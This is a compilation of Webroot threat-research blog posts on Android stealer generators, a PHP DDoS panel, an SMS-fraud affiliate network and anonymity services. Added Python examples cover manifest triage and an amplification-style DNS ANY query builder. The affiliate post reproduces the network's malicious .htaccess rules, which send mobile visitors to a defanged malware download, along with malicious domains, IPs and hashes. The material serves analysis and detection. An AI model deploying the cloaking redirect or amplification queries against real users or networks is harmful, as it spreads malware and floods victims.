Channel: Webroot Blog

[Video] ThreatVlog, Episode 1: Tor and Apple exploits revealed


Changes to the Webroot ThreatBlog

Over the next few days, you will begin to see some changes to the Webroot ThreatBlog. As the company has grown, so has the need for our threat research to be delivered in a clearer, more concise manner. We have worked long and hard on the new blog, adding new content like the ThreatVlog and highlighting the individuals behind all the great threat research done here at Webroot.

So with that, we want to welcome you to the brand new Webroot ThreatBlog. It is more than a URL update: it is a whole new look to help you stay up to date on the digital threats out there, and on how to stay protected.

To better help you transition, here are two links for reference.

New web URL: http://www.webroot.com/blog/
RSS feed update: http://www.webroot.com/blog/feed/

The post Changes to the Webroot ThreatBlog appeared first on Webroot Threat Blog.

[Video] ThreatVlog, Episode 3: NYT, Twitter, and HuffPost hacked by Syrian Electronic Army

DIY malicious Android APK generating ‘sensitive information stealer’ spotted in the wild

Back in June 2013, we offered a peek inside a DIY Android .apk decompiler/injector that was not only capable of ‘binding’ Android malware to virtually any legitimate app, but was also developed to work exclusively with a publicly obtainable Android-based trojan horse.

In this post, I’ll profile a similar, recently released cybercrime-friendly Windows-based tool that generates malicious ‘sensitive information stealing’ Android .apk apps, emphasize its core features, and, most importantly, discuss in depth the implications this type of tool could have on the overall state of the Android malware market.

Sample screenshots of the malicious Android .apk generating ‘sensitive information stealer’ (images not reproduced here).

The generated app is capable of stealing WhatsApp messages (only on rooted devices), SMS messages, personal information, contacts and photos; it can also be configured to auto-start, or to be triggered by a specific SMS message sent to the device. The stolen data can then be sent back to the attacker over the victim’s existing connection, or as an ‘all-in-one’ zip file to a pre-configured email account.
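
As an added illustration (not code from the original post or from the tool described), here is a Python triage script that checks a decoded AndroidManifest.xml for the capability set a generated stealer of this kind needs: SMS plus contacts/storage read permissions, an SMS_RECEIVED receiver as the remote trigger channel (typically registered with a very high priority), a BOOT_COMPLETED receiver for auto-start, and INTERNET for exfiltration. It assumes the manifest has already been decoded to plain XML (for example with apktool), because the manifest inside an APK is binary XML; the two manifests embedded below are constructed samples, not real malware.

```python
import xml.etree.ElementTree as ET

# Attributes such as android:name live in this namespace in the decoded XML.
ANDROID = "{http://schemas.android.com/apk/res/android}"

SMS_PERMS = {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS"}
CONTACTS_PERM = "android.permission.READ_CONTACTS"
STORAGE_PERMS = {"android.permission.READ_EXTERNAL_STORAGE",
                 "android.permission.WRITE_EXTERNAL_STORAGE"}
NET_PERM = "android.permission.INTERNET"
BOOT_PERM = "android.permission.RECEIVE_BOOT_COMPLETED"
SMS_ACTION = "android.provider.Telephony.SMS_RECEIVED"
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"


def triage_manifest(manifest_xml):
    """Summarise stealer-like capabilities declared in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(ANDROID + "name") for p in root.iter("uses-permission")}

    data_sources = []
    if SMS_PERMS <= perms:
        data_sources.append("sms")
    if CONTACTS_PERM in perms:
        data_sources.append("contacts")
    if STORAGE_PERMS & perms:
        data_sources.append("external storage (photos)")

    triggers = []
    for filt in root.iter("intent-filter"):
        actions = {a.get(ANDROID + "name") for a in filt.iter("action")}
        priority = int(filt.get(ANDROID + "priority", "0"))
        if SMS_ACTION in actions and "android.permission.RECEIVE_SMS" in perms:
            # A very high priority lets the receiver see (and on older Android
            # abort) an incoming SMS before the default messaging app does.
            triggers.append("sms receiver" + (" (high priority)" if priority >= 1000 else ""))
        if BOOT_ACTION in actions and BOOT_PERM in perms:
            triggers.append("boot receiver")

    can_exfil = NET_PERM in perms
    return {
        "package": root.get("package"),
        "data_sources": data_sources,
        "triggers": triggers,
        "can_exfil": can_exfil,
        # Profile from the post: several data sources, a covert trigger and a
        # way out. One data source alone (a real SMS client) does not qualify.
        "suspicious": can_exfil and len(data_sources) >= 2 and bool(triggers),
    }


# Constructed decoded manifests (not real samples): a stealer-style app and an
# ordinary SMS client that also listens for incoming messages.
STEALER_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakeweather">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Weather">
    <receiver android:name=".CmdReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

SMS_CLIENT_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.messenger">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application android:label="Messenger">
    <receiver android:name=".SmsReceiver">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for manifest in (STEALER_MANIFEST, SMS_CLIENT_MANIFEST):
        print(triage_manifest(manifest))
```

The threshold (two or more data sources, a covert trigger and network access) keeps a legitimate SMS client, which also registers an SMS_RECEIVED receiver, below the bar. The WhatsApp-on-rooted-devices capability leaves no manifest trace; spotting it requires looking at the code for su invocations and reads of another app’s private data directory.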

Not surprisingly, cracked versions of the ‘sensitive information stealer’ are already circulating in the wild.

What’s also worth emphasizing, in terms of the relevance of such tools in today’s Android malware market, is that automation, efficiency and QA (Quality Assurance) are likely to continue being applied to commercially available underground market releases, enabling virtually anyone who purchases them to generate undetected malware for the Android platform, to be monetized later through an affiliate network.

Moreover, at a time when mobile traffic can be purchased or abused on the fly and redirected to any URL a cybercriminal provides, we expect to continue observing the abuse of cybercrime-friendly underground traffic exchanges, combined with either the direct compromise of a legitimate host or the hijacking of a trusted/verified Google Play account (obtained by data mining a botnet’s infected population), as the tactic of choice.

You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.

The post DIY malicious Android APK generating ‘sensitive information stealer’ spotted in the wild appeared first on Webroot Threat Blog.

Scammers pop up in Android’s Calendar App

Over the last couple of days, we’ve intercepted a rather interesting fraudulent approach that’s not just successfully hitting users’ inboxes internationally, but is also popping up as an event in their Android Calendar apps.

How is this possible? Fairly simple.

Sample screenshot of the fraudulent Google Calendar invitation (image not reproduced here).

Through automatic registration, made possible by outsourcing the CAPTCHA solving process, fraudsters register thousands of bogus accounts that are later abused as part of Google’s ecosystem, the Calendar feature in particular, whose invitations are automatically synced to the recipient’s Android devices.

Therefore, by automating the process of sending Calendar invites, 419 advance fee scammers, or virtually any other type of scammer, push their fraudulent ‘proposals’ directly onto the Android devices of their prospective victims. The tactic is strongly reminiscent of known cases in which 419 advance fee scammers abused the “Email This” features of Dilbert.com and NYTimes.com in an attempt to bypass anti-spam filters.

Given the ease of registering tens of thousands of Google Accounts, or simply buying access to pre-registered ones, we expect this practice to continue, with the fraudsters behind it eventually shortening the time between the invitation and the event itself, to achieve a near real-time ‘reminder’ notification for the Calendar event.

You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.

The post Scammers pop up in Android’s Calendar App appeared first on Webroot Threat Blog.

[Video] Episode 4: ThreatVlog SMS Fake Installer tricking Android Users


Web-based DNS amplification DDoS attack mode supporting PHP script spotted in the wild

The idea of controlling multiple high-bandwidth servers for launching DDoS attacks, as opposed to, for instance, hundreds of thousands of malware-infected hosts, has always tempted cybercriminals to ‘innovate’ and seek pragmatic ‘solutions’ for achieving this objective.

Among the most recent high-profile examples of this server-based DDoS tactic is Operation Ababil, the Izz ad-Din al-Qassam (a.k.a. Qassam Cyber Fighters) attacks against major U.S. financial institutions, in which the attackers made use of high-bandwidth servers. This indicates that wishful thinking often tends to materialize.

In this post, we’ll take a peek inside what appears to be a command and control PHP script in its early stages of development, capable of integrating multiple (compromised) servers for the purpose of launching distributed denial of service (DDoS) attacks that take advantage of their bandwidth.

Sample screenshots of the administration panel of the PHP script (images not reproduced here).

Currently, the PHP script supports four types of DDoS attack: DNS amplification, spoofed SYN, spoofed UDP, and HTTP with proxy support. The script also acts as a centralized command and control interface for all the servers on which it has been (secretly) installed. It’s currently offered for $800.

Just as in numerous other cybercrime-friendly underground market releases, the author of the PHP script is once again shifting responsibility for its use onto potential customers and, surprisingly, at a time when fake scanned IDs continue to be systematically abused by cybercriminals, is expressing trust in the user verification methods applied by his payment processor of choice, WebMoney.
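
To make the DNS amplification mode concrete from the defender’s side, here is an added Python example (not part of the original post or of the PHP script discussed) with two pieces: a builder for the wire-format DNS ANY query with an EDNS0 OPT record that an amplifier abuser sends with the victim’s spoofed source address, so the request size can be compared with the response size, and a detector that runs over BIND-style query log lines to find a name server being used as a reflector. The log lines, IP addresses and the 3,600-byte response size used below are constructed assumptions.

```python
import re
import struct
from collections import Counter


def build_any_query(qname, txid=0x1234, udp_payload=4096):
    """Wire-format DNS query: <qname> IN ANY, plus an EDNS0 OPT record that
    advertises a large UDP buffer so the server answers with one big datagram.
    This is the small packet an abuser sends with the victim's spoofed source."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 1)  # RD set; 1 question, 1 additional
    labels = b"".join(bytes([len(label)]) + label.encode("ascii")
                      for label in qname.rstrip(".").split("."))
    question = labels + b"\x00" + struct.pack(">HH", 255, 1)  # QTYPE=ANY(255), QCLASS=IN
    # OPT RR: root name, TYPE=41, CLASS=requestor's UDP payload size, TTL=0, RDLEN=0
    opt = b"\x00" + struct.pack(">HHIH", 41, udp_payload, 0, 0)
    return header + question + opt


def amplification_factor(query, response_len):
    """Bytes the server sends to the victim per byte the attacker spends."""
    return response_len / len(query)


# BIND "queries" channel format, e.g.
#   client 198.51.100.7#53 (isc.org): query: isc.org IN ANY +E (203.0.113.10)
# Newer BIND versions put an "@0x..." token before the address; it is skipped.
QUERY_LOG = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<client>[0-9A-Fa-f.:]+)#\d+ \S+ query: "
    r"(?P<qname>\S+) IN (?P<qtype>\S+) (?P<flags>\S+)")

# Query types whose answers are large enough to be worth reflecting.
AMPLIFYING_TYPES = {"ANY", "TXT", "DNSKEY", "RRSIG"}


def reflection_suspects(log_text, min_queries=3):
    """Count EDNS queries for amplifying types per (client, name) and return
    the pairs at or above min_queries. With spoofed sources, 'client' is the
    victim being flooded through this server, not the attacker."""
    hits = Counter()
    for line in log_text.splitlines():
        m = QUERY_LOG.search(line)
        if m and m["qtype"] in AMPLIFYING_TYPES and "E" in m["flags"]:
            hits[(m["client"], m["qname"])] += 1
    return {key: n for key, n in hits.items() if n >= min_queries}


# Constructed log lines (not from the page): four ANY queries for one name
# arriving from the same "client" within milliseconds, plus normal traffic.
SAMPLE_QUERY_LOG = """\
13-Sep-2013 09:12:01.001 client 198.51.100.7#53 (isc.org): query: isc.org IN ANY +E (203.0.113.10)
13-Sep-2013 09:12:01.002 client 198.51.100.7#53 (isc.org): query: isc.org IN ANY +E (203.0.113.10)
13-Sep-2013 09:12:01.004 client 198.51.100.7#53 (isc.org): query: isc.org IN ANY +E (203.0.113.10)
13-Sep-2013 09:12:01.009 client 198.51.100.7#53 (isc.org): query: isc.org IN ANY +E (203.0.113.10)
13-Sep-2013 09:12:01.500 client 192.0.2.44#51023 (www.example.com): query: www.example.com IN A + (203.0.113.10)
13-Sep-2013 09:12:02.100 client 192.0.2.45#51024 (example.com): query: example.com IN TXT +E (203.0.113.10)
"""

if __name__ == "__main__":
    q = build_any_query("isc.org")
    print(len(q), "byte query; assumed 3600-byte response ->",
          amplification_factor(q, 3600), "x")
    print(reflection_suspects(SAMPLE_QUERY_LOG))
```

Because the source address is spoofed, the “client” the log shows is the victim, so blocking it only completes the attack. The remedy is to stop being an amplifier: restrict recursion to your own networks, enable response rate limiting, and on authoritative servers refuse ANY over UDP or answer it minimally.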

We believe that this tool will eventually get abused by its customers, and we’ll continue to monitor its future development.

You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.

The post Web-based DNS amplification DDoS attack mode supporting PHP script spotted in the wild appeared first on Webroot Threat Blog.

Managed Malicious Java Applets Hosting Service Spotted in the Wild

In a series of blog posts, we’ve been profiling the tactics and DIY tools of novice cybercriminals, whose malicious campaigns largely rely on social engineering techniques to trick users into thinking they’ve been presented with a legitimate Java applet window. These malicious Java applets continue to represent a popular infection vector among novice cybercriminals, who remain the primary customers of the DIY tools/attack platforms we’ve been profiling.

In this post, I’ll discuss a popular service that exclusively offers hosting for malicious Java applets.

Sample screenshot of the service (image not reproduced here).

For a one-time fee of $20, the service offers detailed statistics on how people ran the applet hosted on its server, as well as the ability to clone a popular website and automatically embed a custom malicious Java applet in it. The service also offers managed rotation of typosquatted domains to its prospective customers, making it easier for them to operate their campaigns.

Based on our initial analysis of the service’s operations, we can easily conclude that its operators lack the experience and motivation of sophisticated bulletproof hosting providers, like the ones we’ve profiled in the past. Nevertheless, its public availability has already empowered multiple novice cybercriminals with the hosting necessary to achieve their malicious objectives.

Although we believe this is a short-term market niche within the international underground market, we’ll continue monitoring its development.

The post Managed Malicious Java Applets Hosting Service Spotted in the Wild appeared first on Webroot Threat Blog.

[Video] Episode 5: Vodafone hacked, Super Hacker arrested, and bad GTAV torrents

In this episode of ThreatVlog, Tyler Moffitt talks about the 2 million user hack that Vodafone experienced last week, which investigators say was an inside job. He also covers the arrest of the ‘Superhacker’ in Argentina, who turned computers into zombies and was able to steal $50,000 a month from users. And in big news, Grand Theft Auto V was released today, and torrents are already being discovered packed full of malware and phishing schemes.

The post [Video] Episode 5: Vodafone hacked, Super Hacker arrested, and bad GTAV torrents appeared first on Webroot Threat Blog.

Affiliate network for mobile malware impersonates Google Play, tricks users into installing premium-rate SMS sending rogue apps

Affiliate networks are an inseparable part of the cybercrime ecosystem. Largely thanks to their win-win revenue-sharing model, over the years they’ve established themselves as a crucial part of the cybercrime growth model, ensuring that a cybercriminal will indeed receive a financial incentive for his fraudulent/malicious activities online.

From pharmaceutical affiliate networks and iPhone-selling affiliate networks to affiliate networks for pirated music and OEM (Original Equipment Manufacturer) software, cybercriminals continue to professionally monetize every aspect of the underground marketplace, harnessing the experience, know-how and traffic acquisition capabilities of fellow cybercriminals.

In this post, I’ll take a peek inside a cybercrime-friendly affiliate network for premium-rate SMS mobile malware, list the premium-rate numbers it currently uses, provide MD5s of variants known to have been pushed by it, and discuss its business model.

Sample screenshots of the administration panel for a participant in the affiliate network for mobile malware (images not reproduced here).

Next to the fact that anyone can join the affiliate network, it’s also worth emphasizing that the premium-rate SMS-sending mobile malware supports multiple operating systems, as users can be exposed to .APK (Android), .SIS (Symbian) and .JAR (Java ME) variants of the same mobile malware. The social engineering vectors of choice for the cybercriminals behind the affiliate network are as follows:

  • Fake Google Play mimicking the mobile version of the marketplace
  • Fake Adult themed videos
  • Fake Mobile Antivirus software
  • Two versions of a Fake Browser Security Update

Let’s discuss the ‘agreement’ (ingenious, from a scammer’s perspective) that users who want to access the bogus/fraudulent content automatically accept. First of all, each web site participating in the affiliate network “assumes no responsibility for any direct or consequential loss arising from the use of the application , including loss of profits and losses“, and that’s just for starters. Whenever a socially engineered user attempts to install the rogue application, the initial SMS he/she sends automatically results in a subscription to the service, with the rogue application then sending premium-rate SMS messages in the background.

Known mobile malware MD5s pushed by the affiliate network:
MD5: 58668c269215e6e8a781e8e7bac1b4c3 – detected by 24 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Java:SMSreg-AW [PUP]
MD5: c12d148689cfbb80b271036c260b1d91 – detected by 27 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Trojan.Java.Smssend.AE
MD5: ead1a96f2a240987027e7935d3dfaef6 – detected by 24 out of 46 antivirus scanners as Trojan:Android/Fakeinst.T; Android:FakeInst-BH [Trj]
MD5: 306fe878ac61615c0571d34b3de733a6 – detected by 26 out of 45 antivirus scanners as Trojan.Java.Smssend.AE; HEUR:Trojan-SMS.J2ME.Agent.gen
MD5: 7fb7e22dcc91b24498f1c14e5d41a21d – detected by 26 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Trojan.Java.Smssend.AE

Premium-rate numbers used in the campaigns:
3150; 3170; 3200; 3190; 8055; 8155; 3352; 3353; 1350; 7122; 4448; 9990; 3150; 3190; 3006; 3170; 9293; 9394; 5060; 3602; 1897; 4161; 4446; 4449; 4448; 1302; 82300

.htaccess modification suggested to participants to automatically serve the mobile malware to visitors of the web site (reproduced as distributed, with the redirect target defanged):
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ hxxp://browserupdate.mobi/mf/?stream=&type=apk [L,R=]
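
The rules above are a mobile-only cloak: desktop visitors, and the download tools and media players the negated conditions exclude, get the cloned page, while mobile User-Agents are redirected to the .apk. As an added example, not part of the original post or the affiliate network’s own code, the following Python reproduces that decision so a researcher can predict which User-Agent values will trigger the redirect before fetching the page with a spoofed header. The patterns are transcribed from the rules; the sample User-Agent strings are constructed.

```python
import re

# Patterns transcribed from the affiliate network's .htaccess rules above.
# Apache evaluates consecutive [OR] RewriteCond lines as one OR-group, then
# ANDs that group with the negated (!) conditions that follow; [NC] makes
# every match case-insensitive. Note that in the Accept pattern the '+' of
# "xhtml+xml" is a regex quantifier, so that alternative never matches the
# literal MIME type; the pattern is kept as the attacker wrote it.
ACCEPT_COND = r"text/vnd.wap.wml|application/vnd.wap.xhtml+xml"
UA_CONDS = [
    r"acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-",
    r"dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-",
    r"maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv",
    r"palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany",
    r"sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo",
    r"teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi",
    r"wapp|wapr|webc|winw|winw|xda|xda-",
    r"up.browser|up.link|windowssce|iemobile|mini|mmp",
    r"symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android",
]
UA_EXCLUDES = ["macintosh", "america", "avant", "download", "windows-media-player"]

# Constructed sample request headers (not captured traffic).
DESKTOP_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36")
ANDROID_UA = ("Mozilla/5.0 (Linux; Android 4.3; Nexus 4 Build/JWR66Y) "
              "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.72 "
              "Mobile Safari/537.36")


def would_redirect(user_agent, accept=""):
    """Return True if mod_rewrite would apply the RewriteRule to this request."""
    flags = re.IGNORECASE
    looks_mobile = bool(re.search(ACCEPT_COND, accept, flags)) or any(
        re.search(pattern, user_agent, flags) for pattern in UA_CONDS)
    if not looks_mobile:
        return False
    # The ! conditions veto the redirect for anything matching the excluded words.
    return not any(re.search(pattern, user_agent, flags) for pattern in UA_EXCLUDES)


if __name__ == "__main__":
    for ua in (DESKTOP_UA, ANDROID_UA):
        print(would_redirect(ua), ua[:40])
```

Fetching the same URL twice, once with a stock Android User-Agent and once with a desktop one, shows the two different responses; only the first will carry the redirect to the .apk.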

Known mobile malware-serving domains that are part of the core infrastructure of the affiliate network:
hxxp://iosoffer.mobi/cpa/&stream= – 91.223.77.198
hxxp://mid2psys.mobi/js.php?stream= – 91.223.77.198
hxxp://browserupdate.mobi/mf/?stream= – 91.213.175.66
hxxp://playsmarket.mobi/?stream= – 91.213.175.66
hxxp://adtivirusmobile.mobi/?stream= – 91.213.175.66
hxxp://wapadults.mobi/?stream=3963 – 91.213.175.66

Also responding to 91.223.77.198 are the following domains participating in the affiliate network’s infrastructure:
allnokia88.ru
allnokia99.ru
iosoffer.mobi
mid2psys.mobi
mob-in-portal.mobi
serv-nokia.ru

Related mobile malware domains known to have participated in campaigns courtesy of the same affiliate network:
3xplay.ru
adtivirusmobile.mobi
advdemo.ru
allnokia88.ru
allnokia99.ru
allwapup.ru
android4plays.ru
awtoforum.ru
browserupdate.mobi
burniyson.org
funkit-fot-you.ru
google-video.ru
htavefg.ru
java-praktika.ru
kopiivipshop.ru
lwupdate.ru
market-mobile.tk
mid2psys.mobi
mob-in-portal.mobi
mobi-fotoppz.ru
mobpornn.biz
my-hut.ru
news-top.info
newsmobi.info
opera-mini-software.ru
opera-seven.ru
operablock-in.mobi
operamini-7-5.ru
operamobi-in.mobi
operanew-in.mobi
operanew-in.ru
operaupdate-in.mobi
operaupdate-in.ru
playsmarket.mobi
poppnuha.ru
rap-schokk.ru
scaner.biz
serv-nokia.ru
shwap.mobi
soft-ipad.tk
soft-iphone.tk
sotkina.pp.ua
tutnauka.ru
update-brows.tk
vandroide.ru
wapadults.mobi
xvideos-porno.mobi
xxx-tubesex.ru
xxx4iphone.ru
xxx4mobile.ru
zonanauki.ru

We expect to continue observing an increase in mobile malware pushed through affiliate networks, which empower underground market participants with managed infrastructure, systematically rotated undetected mobile malware samples, and the actual monetization vector to take advantage of in the first place.

The post Affiliate network for mobile malware impersonates Google Play, tricks users into installing premium-rate SMS sending rogue apps appeared first on Webroot Threat Blog.

How to avoid unwanted software

We’ve all seen it; maybe it’s on your own computer, or that of a friend, your spouse, child, or parent. Your home page has been changed to some search engine you’ve never heard of, and there’s a new, annoying toolbar in your browser. Maybe you’re getting popup ads or have a rogue security product claiming you’re infected and asking you to buy the program to remove the infection. Even worse, you don’t know how it got there! Welcome to the world of Potentially Unwanted Applications (PUAs). Chances are that these programs were inadvertently installed along with software from sites that use “download managers”, which bundle additional software with otherwise free downloads.

Many of these “download managers” and the additional applications they install use a Pay Per Install business model, which is often exploited by unscrupulous individuals who use various techniques to trick you into clicking on their sites rather than the official download site for the software you’re attempting to download. These techniques include advertisements on search engines and various Search Engine Optimization (SEO) techniques to get their sites to show up before the official downloads in search results. We’ve even seen fake image upload sites whose sole purpose is to direct you to a page that looks like an official download page for a program but uses one of these “download managers” instead.

So how do you avoid these “download managers”? It’s actually pretty simple. Whenever possible, download software from the software company’s official page (this is not always possible, since some software is only available through third-party download sites). As mentioned earlier, some of the most popular techniques for getting you to install software through these “download managers” are ads and SEO on search engines, so we’ll show you how to locate the official download links in search results from Google, Bing, and Yahoo.

For this example we’ll search for the popular voice and video chat program Skype by searching for “download Skype.”

With Google it is rather easy to spot the official download link, since the advertisements are clearly marked and the first actual result is the official download link (screenshot not reproduced here).

Let’s have a look at Bing next. Since both Skype and Bing are Microsoft products, the first two search results are the official download links (screenshot not reproduced here).

For a better example of Bing results, let’s search for Adobe Reader by searching for “download adobe acrobat reader.” This one is also pretty easy to spot, since the ads are clearly marked (screenshot not reproduced here).

Now let’s have a look at the results for “download Skype” on Yahoo. Once again, the ads are clearly marked and the first actual result is the official download link (screenshot not reproduced here).

Looking at these search results, you’ll notice a few things in common: the top results are all ads, none of the ads point to the official download links, and the first result that is not an advertisement is the official download link. While this will not always be the case, it is common, and fortunately the three search engines we used in this example all do a very good job of identifying their advertisements. Does this mean that all ads are bad? Of course not! But when looking to download free software, the ads may not be your best choice. Also pay attention to the URLs: the official downloads are all on “skype.com” domains, while all the ads point to other domains.

Now you should have a better understanding of how some of those unwanted toolbars and search pages ended up on your computer, why clicking on the top result on a search page may not be the best way to download free software, and how to find the official download links on some of the most popular search engines. Pass this information on to others, and maybe you’ll save yourself a trip to a friend or family member’s house to remove an unwanted toolbar.

The post How to avoid unwanted software appeared first on Webroot Threat Blog.

419 advance fee fraudsters abuse CNN’s ‘Email This’ Feature, spread Syrian Crisis themed scams

Opportunistic 419 advance fee scammers are currently using CNN.com’s “Email This” feature to spamvertise Syrian Crisis themed emails, in an attempt to bypass anti-spam filters and ultimately trick users into interacting with these fraudulent emails. The emails are just the tip of the iceberg in an ongoing attempt by multiple cybercrime gangs to take advantage of the geopolitical situation (an event-based social engineering attack) for fraudulent purposes; they continue spamming tens of thousands of emails impersonating internationally recognized agencies in order to convince users of the emails’ legitimacy.

Sample screenshot of the spamvertised email (image not reproduced here).

This isn’t the first time we’ve seen 419 scammers abuse a legitimate web site’s “Email This” feature. Besides the most recent abuse of Google Calendar, we also observed them abusing legitimate web sites back in 2009 (Dilbert.com and NYTimes.com), and we believe we’ll continue seeing this type of abuse, given that 419-ers are constantly seeking new and pragmatic ways to bypass anti-spam filters.

How to prevent falling victim to such type of attacks? Go through these tips.

The post 419 advance fee fraudsters abuse CNN’s ‘Email This’ Feature, spread Syrian Crisis themed scams appeared first on Webroot Threat Blog.

Cybercriminals offer anonymous mobile numbers for ‘SMS activation’, video tape the destruction of the SIM card on request

For years, cybercriminals have been abusing a rather popular, personally identifiable practice: the activation of an online account for a particular service via SMS. The practice relies on the basic logic that a user who has associated a mobile number with the account would not abuse the service’s ToS (Terms of Service) for fraudulent or malicious purposes, while ignoring the fact that SIM cards can be obtained by providing fake IDs, which increases the probability of direct abuse of the service in a fraudulent/malicious fashion.

What are cybercriminals up to in terms of anonymous SIM cards these days? Differentiating their UVP (unique value proposition) by offering what they refer to as a “VIP service” with a “personal approach” for each new client. In this post, I’ll discuss a newly launched service offering anonymous SIM cards for the activation of services that require SMS-based activation, and emphasize its unique UVP.

Sample screenshots of the inventory of anonymous SIM cards offered for sale (images not reproduced here).

Next to the inventory of cybercrime-friendly non-attributable SIM cards, the cybercriminal behind this underground market proposition is also attempting to add value to it, by not just offering the option to store the SIM cards in a safe box, but also to destroy a SIM card on request, with video proof of the actual process (screenshot not reproduced here).

Sample screenshot of a video proof showing the destruction of an already used SIM card, courtesy of the service (image not reproduced here).

The service also charges a premium price for sending and receiving SMS messages, due to the value added features.

The existence and proliferation of such services, built on false identities, directly contributes to the rise of fraudulent and malicious schemes launched by their users. Once a pseudo-legitimate identification has taken place on a popular web site, a fraudster is in a perfect position not just to start abusing its trusted infrastructure as a foundation for launching related attacks, but also to directly target the web service’s own users through the trusted mechanisms it offers.

We’ll continue monitoring this underground market segment, and post updates as soon as new services offering anonymous SIM cards emerge.

The post Cybercriminals offer anonymous mobile numbers for ‘SMS activation’, video tape the destruction of the SIM card on request appeared first on Webroot Threat Blog.


Yet another ‘malware-infected hosts as anonymization stepping stones’ service offering access to hundreds of compromised hosts spotted in the wild

The general availability of DIY malware-generating tools continues to contribute to the growth of ‘malware-infected hosts as anonymization stepping stones’ Socks4/Socks5/HTTP services, with new entrants joining this largely commoditized market segment on a daily basis. Thanks to the virtually non-attributable campaigns that can be launched through malware-infected hosts, the cybercrime underground continues to seek innovative and efficient ways to integrate the inventories of these services into the market-leading tools and platforms for managing and launching fraudulent/malicious campaigns.

Let’s take a peek at one of the most recently launched services offering automatic access to hundreds of malware-infected hosts to be used as anonymization stepping stones.

Sample screenshot of the “malware-infected hosts as anonymization stepping stones” service (image not reproduced here).

One of the main differentiating factors for this type of service is whether it keeps re-supplying new customers with access to the same set of compromised hosts converted into Socks4/Socks5/HTTP servers, or offers exclusive access to a specific set of servers on a per-customer basis. The lack of QA (Quality Assurance) in this particular service is likely to lower the quality of the campaigns launched through these servers, as multiple cybercriminals will now have access to the same pool of compromised hosts, which inevitably increases the probability that the hosts will quickly be labeled as IPs with extremely bad reputation.

Catch up with previous research on the topic of “Anonymizing a cybercriminal’s Internet activities”, by going through the following posts:

